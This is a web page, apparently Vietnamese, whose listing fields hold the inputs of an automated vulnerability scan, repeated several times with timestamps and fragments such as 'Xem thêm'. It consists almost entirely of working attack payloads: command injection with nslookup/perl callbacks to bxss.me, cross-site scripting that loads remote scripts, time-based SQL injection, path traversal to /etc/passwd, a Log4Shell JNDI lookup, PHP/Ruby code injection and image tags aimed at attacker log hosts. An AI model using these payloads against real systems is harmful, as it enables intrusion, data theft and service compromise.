(nslookup hitgwfattrgst519c6.bxss.me||perl -e "gethostbyname('hitgwfattrgst519c6.bxss.me')")

|echo odqswd$()\ plgfxu\nz^xyu||a #' |echo odqswd$()\ plgfxu\nz^xyu||a #|" |echo odqswd$()\ plgfxu\nz^xyu||a #

&echo gsjyqj$()\ yxzxbr\nz^xyu||a #' &echo gsjyqj$()\ yxzxbr\nz^xyu||a #|" &echo gsjyqj$()\ yxzxbr\nz^xyu||a #

echo unxbmm$()\ mfzyku\nz^xyu||a #' &echo unxbmm$()\ mfzyku\nz^xyu||a #|" &echo unxbmm$()\ mfzyku\nz^xyu||a #

1 !(()&&!|||

)

1 '+response.write(9786675*9221999)+'

'.print(md5(31337)).'

${@print(md5(31337))}\

${@print(md5(31337))}

";print(md5(31337));$a="

';print(md5(31337));$a='

1 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 response.write(9786675*9221999)

1 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9974></ScRiPt>

1 1<ScRiPt >7Lyc(9893)</ScRiPt>

1 1'"()&%<acx><ScRiPt >sMCw(9483)</ScRiPt>

bxss.me

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%37%4C%79%63%28%39%33%35%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1 http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1<script>7Lyc(9162)</script>

1some_inexistent_file_with_long_name%00.jpg

1 '+'A'.concat(70-3).concat(22*4).concat(99).concat(85).concat(98).concat(82)+(require'socket' Socket.gethostbyname('hittf'+'nzhgoydzfc44d.bxss.me.')[3].to_s)+'

1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 1<WNHPWN>1FWJ6[!+!]</WNHPWN>

1 bxss.me/t/xss.html?%00

1 HttP://bxss.me/t/xss.html?%00

1<ScRiPt >7Lyc(9565)</ScRiPt>

"+"A".concat(70-3).concat(22*4).concat(103).concat(66).concat(107).concat(74)+(require"socket" Socket.gethostbyname("hitwf"+"jabtsdgub542b.bxss.me.")[3].to_s)+"

1 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

1 acx${98991*97996}::.x

1 1&n986062=v953466

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 acx[[${98991*97996}]]xca

/xfs.bxss.me

1 <!--

'"

1 ".gethostbyname(lc("hitiu"."vgmvpwnx5f545.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(77).chr(107).chr(85)."

'.gethostbyname(lc('hitjz'.'eckbnqgsc6a8c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(75).chr(106).chr(70).'

1 1<esi:include src="http://bxss.me/rpb.png"/>

1 ${9999901+10000473}

1 /../../../../../../../../../../windows/system32/BITSADMIN.exe

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1 ${j${::-n}di:dns${::-:}//hitbabpwqnebk1a107${::-.}bxss.me}

1 sceZetdZ

1 '.print(md5(31337)).'

${@print(md5(31337))}\

${@print(md5(31337))}

1 acx{{98991*97996}}xca

";print(md5(31337));$a="

bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 ';print(md5(31337));$a='

1 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

/../../../../../../../../../../windows/system32/BITSADMIN.exe

acux1607%C0%BEz1%C0%BCz2a%90bcxuca1607

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 acu1756%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1756

'+'A'.concat(70-3).concat(22*4).concat(105).concat(68).concat(110).concat(70)+(require'socket' Socket.gethostbyname('hitab'+'oriemdgq2ed8d.bxss.me.')[3].to_s)+'

"+"A".concat(70-3).concat(22*4).concat(119).concat(89).concat(98).concat(83)+(require"socket" Socket.gethostbyname("hitcw"+"tqahbbaaab9cd.bxss.me.")[3].to_s)+"

1 ${j${::-n}di:dns${::-:}//hitvbglcqdxgi5b96c${::-.}bxss.me}

1 19622232

;(nslookup hitdplxvcqcnq9e8c3.bxss.me||perl -e "gethostbyname('hitdplxvcqcnq9e8c3.bxss.me')")|(nslookup hitdplxvcqcnq9e8c3.bxss.me||perl -e "gethostbyname('hitdplxvcqcnq9e8c3.bxss.me')")&(nslookup hitdplxvcqcnq9e8c3.bxss.me||perl -e "gethostbyname('hitdplxvcqcnq9e8c3.bxss.me')")

`(nslookup hitdccjmresvsfe32d.bxss.me||perl -e "gethostbyname('hitdccjmresvsfe32d.bxss.me')")`

|(nslookup hitjrcblhycmx8ed05.bxss.me||perl -e "gethostbyname('hitjrcblhycmx8ed05.bxss.me')")

&(nslookup hitfveplmibeaed4b6.bxss.me||perl -e "gethostbyname('hitfveplmibeaed4b6.bxss.me')")&'\"`0&(nslookup hitfveplmibeaed4b6.bxss.me||perl -e "gethostbyname('hitfveplmibeaed4b6.bxss.me')")&`'

$(nslookup hitqtklhapigvd9bfe.bxss.me||perl -e "gethostbyname('hitqtklhapigvd9bfe.bxss.me')")

(nslookup hitpszgjxsfbsbb6d6.bxss.me||perl -e "gethostbyname('hitpszgjxsfbsbb6d6.bxss.me')")

|echo ydtkny$()\ hxypap\nz^xyu||a #' |echo ydtkny$()\ hxypap\nz^xyu||a #|" |echo ydtkny$()\ hxypap\nz^xyu||a #

&echo jeavxu$()\ xpcsmk\nz^xyu||a #' &echo jeavxu$()\ xpcsmk\nz^xyu||a #|" &echo jeavxu$()\ xpcsmk\nz^xyu||a #

echo mkyway$()\ vulcgl\nz^xyu||a #' &echo mkyway$()\ vulcgl\nz^xyu||a #|" &echo mkyway$()\ vulcgl\nz^xyu||a #

1 <!--

'"()&%<acx><ScRiPt >7Lyc(9498)</ScRiPt>

1'"()&%<acx><ScRiPt >7Lyc(9564)</ScRiPt>

1 "+response.write(9940288*9279983)+"

1 ^(#$!@#$)(()))******

'+response.write(9940288*9279983)+'

1 ../1

response.write(9940288*9279983)

1 ../../../../../../../../../../../../../../windows/win.ini

1 ../../../../../../../../../../../../../../etc/passwd

1 KAmHvOzx

${9999013+9999665}

1 '"()

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 1<esi:include src="http://bxss.me/rpb.png"/>

1 '"

1 ".gethostbyname(lc("hitsq"."ssofkvvye4f2f.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(70).chr(100).chr(81)."

1 1&n937996=v921382

1 '.gethostbyname(lc('hitqk'.'epmawvxe52693.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(90).chr(102).chr(85).'

1 /xfs.bxss.me

1 !(()&&!|||

)

1 1CYGD6sYapO

1 1<aHRLwoT<

1<img sRc='http://attacker-9465/log.php?

1<alolg73 x=9978>

1<ifRAme sRc=9572.com></IfRamE>

1<WIHDTZ>KIRJZ[!+!]</WIHDTZ>

12mPvW <ScRiPt >S5D5(9282)</ScRiPt>

1}body{acu:Expre/**/SSion(S5D5(9064))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=S5D5(9330)>

�<img acu onmouseover=S5D5(90731) //�>

1<ScRiPt>S5D5(9046)</sCripT>

1\u003CScRiPt\S5D5(9977)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%53%35%44%35%289684%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9257)>

1<img src=xyz OnErRor=S5D5(9862)>

1<img src=//xss.bxss.me/t/dot.gif onload=S5D5(9776)>

1<body onload=S5D5(9905)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9986'>

1<isindex type=image src=1 onerror=S5D5(9369)>

1<svg �onload=S5D5(9500);>

1<ScRiPt >S5D5(9973)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9618></ScRiPt>

1 1<ScRiPt >S5D5(9125)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%35%44%35%28%39%35%35%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1 @@EILJa

1<script>S5D5(9710)</script>

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ibNiPpx3')) OR 416=(SELECT 416 FROM PG_SLEEP(15))--

rjF8FMa6') OR 717=(SELECT 717 FROM PG_SLEEP(15))--

RIBQP1PX' OR 333=(SELECT 333 FROM PG_SLEEP(15))--

-1)) OR 843=(SELECT 843 FROM PG_SLEEP(15))--

-5) OR 32=(SELECT 32 FROM PG_SLEEP(15))--

-5 OR 791=(SELECT 791 FROM PG_SLEEP(15))--

ytFBFNyl')); waitfor delay '0:0:15' --

20XaA6CV'); waitfor delay '0:0:15' --

1<W2JKSG>Y5ZNW[!+!]</W2JKSG>

ryoLApEP'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

1<ScRiPt >S5D5(9361)</ScRiPt>

-1" OR 2+346-346-1=0+0+0+1 --

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

-1' OR 2+884-884-1=0+0+0+1 or 'JYakXqOP'='

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1<a8aE1EU<

1 -1' OR 2+484-484-1=0+0+0+1 --

-1 OR 2+699-699-1=0+0+0+1

-1 OR 2+330-330-1=0+0+0+1 --

peHx2iSF

1 1<img sRc='http://attacker-9218/log.php?

1 1<ar4WziB x=9380>

1 1<ifRAme sRc=9727.com></IfRamE>

1 1<WKVBVT>4KALB[!+!]</WKVBVT>

1Txhlq <ScRiPt >4XNx(9803)</ScRiPt>

1}body{acu:Expre/**/SSion(4XNx(9397))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

<a HrEF=jaVaScRiPT:>

1 <%={{={@{#{${acx}}%>

acux1263%C0%BEz1%C0%BCz2a%90bcxuca1263

acu5546%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5546

1 19504868

<a HrEF=http://xss.bxss.me></a>

bxss.me

http://bxss.me/t/fit.txt%3F.jpg

1 Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

'"()&%<acx><ScRiPt >S5D5(9865)</ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 1'"()&%<acx><ScRiPt >S5D5(9882)</ScRiPt>

1&n921320=v992990

1 ;(nslookup hitvntuliczqw93bff.bxss.me||perl -e "gethostbyname('hitvntuliczqw93bff.bxss.me')")|(nslookup hitvntuliczqw93bff.bxss.me||perl -e "gethostbyname('hitvntuliczqw93bff.bxss.me')")&(nslookup hitvntuliczqw93bff.bxss.me||perl -e "gethostbyname('hitvntuliczqw93bff.bxss.me')")

`(nslookup hitefflzwmlgj3a907.bxss.me||perl -e "gethostbyname('hitefflzwmlgj3a907.bxss.me')")`

|(nslookup hitorjqvfkewib4155.bxss.me||perl -e "gethostbyname('hitorjqvfkewib4155.bxss.me')")

&(nslookup hitnnskhwumogda0c1.bxss.me||perl -e "gethostbyname('hitnnskhwumogda0c1.bxss.me')")&'\"`0&(nslookup hitnnskhwumogda0c1.bxss.me||perl -e "gethostbyname('hitnnskhwumogda0c1.bxss.me')")&`'

1 ../1

1 ../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

1 ^(#$!@#$)(()))******

!(()&&!|||

)

1 1<input autofocus onfocus=4XNx(9972)>

1<esi:include src="http://bxss.me/rpb.png"/>

1 '.print(md5(31337)).'

1 ${@print(md5(31337))}\

${@print(md5(31337))}

/xfs.bxss.me

1 �<img acu onmouseover=4XNx(90711) //�>

<!--

'"

";print(md5(31337));$a="

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 '+'A'.concat(70-3).concat(22*4).concat(122).concat(65).concat(119).concat(90)+(require'socket' Socket.gethostbyname('hitby'+'maztbqmv5a355.bxss.me.')[3].to_s)+'

1 /../../../../../../../../../../windows/system32/BITSADMIN.exe

GLPxiwXO

".gethostbyname(lc("hitfu"."jzwditez90428.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(79).chr(98).chr(76)."

'.gethostbyname(lc('hitvd'.'nhzliaivfc30d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(69).chr(120).chr(86).'

1 $(nslookup hitabbtqrnlot28df3.bxss.me||perl -e "gethostbyname('hitabbtqrnlot28df3.bxss.me')")

1 '"()

1 (nslookup hitzlwohufvdz25f16.bxss.me||perl -e "gethostbyname('hitzlwohufvdz25f16.bxss.me')")

|echo ahynis$()\ ianfpo\nz^xyu||a #' |echo ahynis$()\ ianfpo\nz^xyu||a #|" |echo ahynis$()\ ianfpo\nz^xyu||a #

1 &echo pmsacf$()\ tvolrf\nz^xyu||a #' &echo pmsacf$()\ tvolrf\nz^xyu||a #|" &echo pmsacf$()\ tvolrf\nz^xyu||a #

1 echo shaimn$()\ jngbat\nz^xyu||a #' &echo shaimn$()\ jngbat\nz^xyu||a #|" &echo shaimn$()\ jngbat\nz^xyu||a #

1 1<ScRiPt>4XNx(9246)</sCripT>

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 "+response.write(9189018*9518145)+"

"+"A".concat(70-3).concat(22*4).concat(109).concat(83).concat(119).concat(88)+(require"socket" Socket.gethostbyname("hitfm"+"qehhmwbzd85bd.bxss.me.")[3].to_s)+"

'+response.write(9189018*9518145)+'

response.write(9189018*9518145)

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 ${j${::-n}di:dns${::-:}//hitytnjexbcuxdf74e${::-.}bxss.me}

1 1\u003CScRiPt\4XNx(9134)\u003C/sCripT\u003E

1 ${9999564+9999660}

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1 %31%3C%53%63%52%69%50%74%20%3E%34%58%4E%78%289075%29%3C%2F%73%43%72%69%70%54%3E

1 1<img/src=">" onerror=alert(9805)>

1<img src=xyz OnErRor=4XNx(9964)>

;(nslookup hitfcueqhlbyg8adf0.bxss.me||perl -e "gethostbyname('hitfcueqhlbyg8adf0.bxss.me')")|(nslookup hitfcueqhlbyg8adf0.bxss.me||perl -e "gethostbyname('hitfcueqhlbyg8adf0.bxss.me')")&(nslookup hitfcueqhlbyg8adf0.bxss.me||perl -e "gethostbyname('hitfcueqhlbyg8adf0.bxss.me')")

`(nslookup hitnumtiivilw78a69.bxss.me||perl -e "gethostbyname('hitnumtiivilw78a69.bxss.me')")`

|(nslookup hitguvtxiqmyk97e60.bxss.me||perl -e "gethostbyname('hitguvtxiqmyk97e60.bxss.me')")

&(nslookup hitltpltdhapr098f2.bxss.me||perl -e "gethostbyname('hitltpltdhapr098f2.bxss.me')")&'\"`0&(nslookup hitltpltdhapr098f2.bxss.me||perl -e "gethostbyname('hitltpltdhapr098f2.bxss.me')")&`'

$(nslookup hitxfhlzkjidv3375a.bxss.me||perl -e "gethostbyname('hitxfhlzkjidv3375a.bxss.me')")

(nslookup hitzyxvqngiif31a4a.bxss.me||perl -e "gethostbyname('hitzyxvqngiif31a4a.bxss.me')")

|echo ksanjg$()\ kxwqqr\nz^xyu||a #' |echo ksanjg$()\ kxwqqr\nz^xyu||a #|" |echo ksanjg$()\ kxwqqr\nz^xyu||a #

1<img src=//xss.bxss.me/t/dot.gif onload=4XNx(9548)>

1<body onload=4XNx(9937)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9230'>

1<isindex type=image src=1 onerror=4XNx(9108)>

&echo jdsbqw$()\ kaured\nz^xyu||a #' &echo jdsbqw$()\ kaured\nz^xyu||a #|" &echo jdsbqw$()\ kaured\nz^xyu||a #

echo nviwma$()\ zxrymd\nz^xyu||a #' &echo nviwma$()\ zxrymd\nz^xyu||a #|" &echo nviwma$()\ zxrymd\nz^xyu||a #

1 1<svg �onload=4XNx(9925);>

1<ScRiPt >4XNx(9636)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9697></ScRiPt>

1 1<ScRiPt >4XNx(9796)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%34%58%4E%78%28%39%37%34%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1 1<script>4XNx(9741)</script>

1<WRV9MX>TSUPA[!+!]</WRV9MX>

1<ScRiPt >4XNx(9002)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1&n974966=v938249

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux1202%C0%BEz1%C0%BCz2a%90bcxuca1202

acu7973%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7973

1 19442073

'"()&%<acx><ScRiPt >4XNx(9246)</ScRiPt>

1'"()&%<acx><ScRiPt >4XNx(9246)</ScRiPt>

1 ${j${::-n}di:dns${::-:}//hitebgpdlzdtzd115e${::-.}bxss.me}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 /../../../../../../../../../../windows/system32/BITSADMIN.exe

1 0Y4SOtpv

1 ../1

1 ../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

1 ^(#$!@#$)(()))******

!(()&&!|||

)

1 '"()

1 '.print(md5(31337)).'

${@print(md5(31337))}\

${@print(md5(31337))}

1 ";print(md5(31337));$a="

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 @@y5cIX

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1 pPkWD1EU')) OR 468=(SELECT 468 FROM PG_SLEEP(15))--

BhHIwvtm') OR 424=(SELECT 424 FROM PG_SLEEP(15))--

khH6oMC1' OR 385=(SELECT 385 FROM PG_SLEEP(15))--

-1)) OR 298=(SELECT 298 FROM PG_SLEEP(15))--

-5) OR 386=(SELECT 386 FROM PG_SLEEP(15))--

1 -5 OR 598=(SELECT 598 FROM PG_SLEEP(15))--

gkgJchyG')); waitfor delay '0:0:15' --

1 0FthopTg'); waitfor delay '0:0:15' --

BGNh3uB2'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

1 -1)); waitfor delay '0:0:15' --

1 -1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1 if(now()=sysdate(),sleep(15),0)

-1" OR 2+101-101-1=0+0+0+1 --

-1' OR 2+886-886-1=0+0+0+1 or 'Aaf5AGAU'='

-1' OR 2+132-132-1=0+0+0+1 --

1 -1 OR 2+657-657-1=0+0+0+1

1 -1 OR 2+867-867-1=0+0+0+1 --

1 z4C7isp9

1 "+response.write(9898408*9154039)+"

1 '+response.write(9898408*9154039)+'

1 /xfs.bxss.me

1 bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 response.write(9898408*9154039)

1 bxss.me/t/xss.html?%00

${10000374+9999604}

1 HttP://bxss.me/t/xss.html?%00

1 '+'A'.concat(70-3).concat(22*4).concat(102).concat(75).concat(100).concat(88)+(require'socket' Socket.gethostbyname('hitxd'+'bvdmndjo66ab1.bxss.me.')[3].to_s)+'

1 ".gethostbyname(lc("hitgc"."inmjgcwl4d1ba.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(82).chr(117).chr(74)."

"+"A".concat(70-3).concat(22*4).concat(120).concat(71).concat(122).concat(73)+(require"socket" Socket.gethostbyname("hitzz"+"ybtuunckf68a9.bxss.me.")[3].to_s)+"

'.gethostbyname(lc('hited'.'sliyozoi2baa8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(85).chr(101).chr(67).'

1 <!--

1 '"

1 1<esi:include src="http://bxss.me/rpb.png"/>

1 1BB0zBdSAcO

1

7/27/2024 5:09:38 AM 15

1

7/27/2024 5:09:38 AM 14

1

7/27/2024 5:09:37 AM 14

Xem thêm

1

7/27/2024 5:39:08 AM 14

1

7/27/2024 5:39:08 AM 14

1

7/27/2024 5:39:07 AM 14

1<ax2XUsT<

7/27/2024 5:39:06 AM 13

Xem thêm

1<aD4jofg<

7/27/2024 8:24:33 AM 3

1<img sRc='http://attacker-9432/log.php?

7/27/2024 8:24:31 AM 3

1<aiKL9xF x=9939>

7/27/2024 8:24:31 AM 4

Xem thêm

1<akfchi8<

7/27/2024 11:26:31 AM 2

1<img sRc='http://attacker-9385/log.php?

7/27/2024 11:26:31 AM 4

1<aDhiqKc x=9718>

7/27/2024 11:26:30 AM 3

Xem thêm

Đề tài nghiên cứu

1<avPDcRi< 0

1<img sRc='http://attacker-9007/log.php? 0

1<aRFNDwu x=9624> 0

1<ifRAme sRc=9186.com></IfRamE> 0

1<WK2JUV>XSA0Y[!+!]</WK2JUV> 0

1JT9V4 <ScRiPt >cKwK(9196)</ScRiPt> 0

1}body{acu:Expre/**/SSion(cKwK(9011))} 0

<a HrEF=jaVaScRiPT:> 0

<a HrEF=http://xss.bxss.me></a> 0

1<input autofocus onfocus=cKwK(9169)> 0

�<img acu onmouseover=cKwK(91831) //�> 0

1&lt;ScRiPt&gt;cKwK(9639)&lt;/sCripT&gt; 0

1\u003CScRiPt\cKwK(9265)\u003C/sCripT\u003E 0

%31%3C%53%63%52%69%50%74%20%3E%63%4B%77%4B%289989%29%3C%2F%73%43%72%69%70%54%3E 0

1<img/src=">" onerror=alert(9756)> 0

1<img src=xyz OnErRor=cKwK(9567)> 0

1<img src=//xss.bxss.me/t/dot.gif onload=cKwK(9576)> 0

1<body onload=cKwK(9308)> 0

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9699'> 0

1<isindex type=image src=1 onerror=cKwK(9607)> 0

1<svg �onload=cKwK(9616);> 0

1<ScRiPt >cKwK(9776)</ScRiPt> 0

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt> 0

1<ScRiPt >cKwK(9909)</ScRiPt> 0

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%4B%77%4B%28%39%36%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0

1<script>cKwK(9901)</script> 0

1<WSYL9R>PDGXI[!+!]</WSYL9R> 0

1<ScRiPt >cKwK(9722)</ScRiPt> 0

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0

acx__${98991*97996}__::.x 0

acx[[${98991*97996}]]xca 0

acx{{98991*97996}}xca 0

1 0

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0

1 0

<th:t="${acx}#foreach 0

1 0

<%={{={@{#{${acx}}%> 0

acux8794%C0%BEz1%C0%BCz2a%90bcxuca8794 0

acu9829%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9829 0

@@kIHUV 0

1����%2527%2522 0

1'" 0

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0

CkYSBN2l')) OR 650=(SELECT 650 FROM PG_SLEEP(15))-- 0

oX2qDGWd') OR 806=(SELECT 806 FROM PG_SLEEP(15))-- 0

s0TIfKlE' OR 941=(SELECT 941 FROM PG_SLEEP(15))-- 0

-1)) OR 218=(SELECT 218 FROM PG_SLEEP(15))-- 0

-5) OR 592=(SELECT 592 FROM PG_SLEEP(15))-- 0

-5 OR 606=(SELECT 606 FROM PG_SLEEP(15))-- 0

mYAG5jZH')); waitfor delay '0:0:15' -- 0

2eSBbNI0'); waitfor delay '0:0:15' -- 0

19013242 0

4vwyTSEg'; waitfor delay '0:0:15' -- 0

1 waitfor delay '0:0:15' -- 0

-1)); waitfor delay '0:0:15' -- 0

-1); waitfor delay '0:0:15' -- 0

-1; waitfor delay '0:0:15' -- 0

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0

if(now()=sysdate(),sleep(15),0) 0

-1" OR 2+640-640-1=0+0+0+1 -- 0

-1' OR 2+577-577-1=0+0+0+1 or 'LVIKIg23'=' 0

-1' OR 2+941-941-1=0+0+0+1 -- 0

-1 OR 2+646-646-1=0+0+0+1 0

-1 OR 2+523-523-1=0+0+0+1 -- 0

HwEqFK4X 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1 0

1<avPDcRi<

1<img sRc='http://attacker-9007/log.php?

1<aRFNDwu x=9624>

1<ifRAme sRc=9186.com></IfRamE>

1<WK2JUV>XSA0Y[!+!]</WK2JUV>

1JT9V4 <ScRiPt >cKwK(9196)</ScRiPt>

1}body{acu:Expre/**/SSion(cKwK(9011))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=cKwK(9169)>

�<img acu onmouseover=cKwK(91831) //�>

1<ScRiPt>cKwK(9639)</sCripT>

1\u003CScRiPt\cKwK(9265)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%63%4B%77%4B%289989%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9756)>

1<img src=xyz OnErRor=cKwK(9567)>

1<img src=//xss.bxss.me/t/dot.gif onload=cKwK(9576)>

1<body onload=cKwK(9308)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9699'>

1<isindex type=image src=1 onerror=cKwK(9607)>

1<svg �onload=cKwK(9616);>

1<ScRiPt >cKwK(9776)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt>

1<ScRiPt >cKwK(9909)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%4B%77%4B%28%39%36%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>cKwK(9901)</script>

1<WSYL9R>PDGXI[!+!]</WSYL9R>

1<ScRiPt >cKwK(9722)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1

<th:t="${acx}#foreach

1

<%={{={@{#{${acx}}%>

acux8794%C0%BEz1%C0%BCz2a%90bcxuca8794

acu9829%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9829

@@kIHUV

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

CkYSBN2l')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--

oX2qDGWd') OR 806=(SELECT 806 FROM PG_SLEEP(15))--

s0TIfKlE' OR 941=(SELECT 941 FROM PG_SLEEP(15))--

-1)) OR 218=(SELECT 218 FROM PG_SLEEP(15))--

-5) OR 592=(SELECT 592 FROM PG_SLEEP(15))--

-5 OR 606=(SELECT 606 FROM PG_SLEEP(15))--

mYAG5jZH')); waitfor delay '0:0:15' --

2eSBbNI0'); waitfor delay '0:0:15' --

19013242

4vwyTSEg'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

